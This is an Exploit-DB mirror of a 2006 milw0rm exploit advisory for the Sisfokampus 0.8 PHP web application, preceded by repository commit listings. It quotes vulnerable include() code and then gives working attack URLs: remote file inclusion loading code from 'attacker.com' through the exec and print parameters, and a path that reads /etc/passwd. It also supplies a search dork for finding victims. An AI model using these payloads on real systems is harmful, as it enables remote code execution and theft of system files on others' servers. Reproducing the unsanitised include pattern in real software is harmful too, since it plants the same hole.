exploit-db-mirror/platforms/php/webapps/2847.txt
Offensive Security 477bcbdcc0 DB: 2016-03-17
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

83 lines
2.6 KiB
Text
Executable file

# Source Code = Sisfokampus 0.8
#
# Website = www.Sisfokampus.net
#
# Author = E. Setio Dewo (setio_dewo@telkom.net)
#
# Dorkz : Allinurl: /index.php?exec=
# File Vuln : index.php
# print.php
# download.php ( Local File Include )
#
# Found by : Wawan Firmansyah a.k.a Ang|n
angkaramurka2003@yahoo.com
###############################################################################
# Source of index.php
-------------------------[Line 27]-----------------------------
<?php
if ($exec=='main.php' && file_exists("$themedir/main.php"))
include "$themedir/main.php";
else include $exec;
?>
-------------------------[Line 31]------------------------------
# Source Of print.php
-------------------------[Line 15]------------------------------
<?php
include_once "sysfo/sysfo.common.php";
if (isset($_REQUEST['print'])) {
$print = $_REQUEST['print'];
include "$print";
}
else die (DisplayHeader($fmtErrorMsg, $strNoDataTobePrint));
include "disconnectdb.php";
?>
-------------------------[Line 25]-------------------------------
# Source Of download.php
-------------------------[Line 1]--------------------------------
<?php
DisplayHeader($fmtPageTitle, $strDownload);
include "lib/file.common.php";
if (isset($_REQUEST['dir'])) $dir = $_REQUEST['dir'];
else $dir = $Download_dir;
if (substr($dir, -1) != '/' && substr($dir, -1) != '\\') $dir = "$dir/";
DisplayDownloadDir($dir);
?>
-------------------------[Line 8]--------------------------------
##################################################################################
# Exploit of index.php
http://www.victim.com/index.php?exec=http://attacker.com/evilcode.txt?
# Exploit of print.php
http://www.victim.com/print.php?print=http://attacker.com/evilcode.txt?
or
http://www.victim.com/index.php?exec=print&print=http://attacker.com/evilcode.txt?
# Exploit of download.php
http://www.victim.com/index.php?exec=download&dir=/etc/passwd
##################################################################################
Greatz :
K-159 ( Thanks for ur Support & Advice )
#cyberbox community in dal.net
#indolinux in dal.net
#edp in dal.net
##################################################################################
# milw0rm.com [2006-11-25]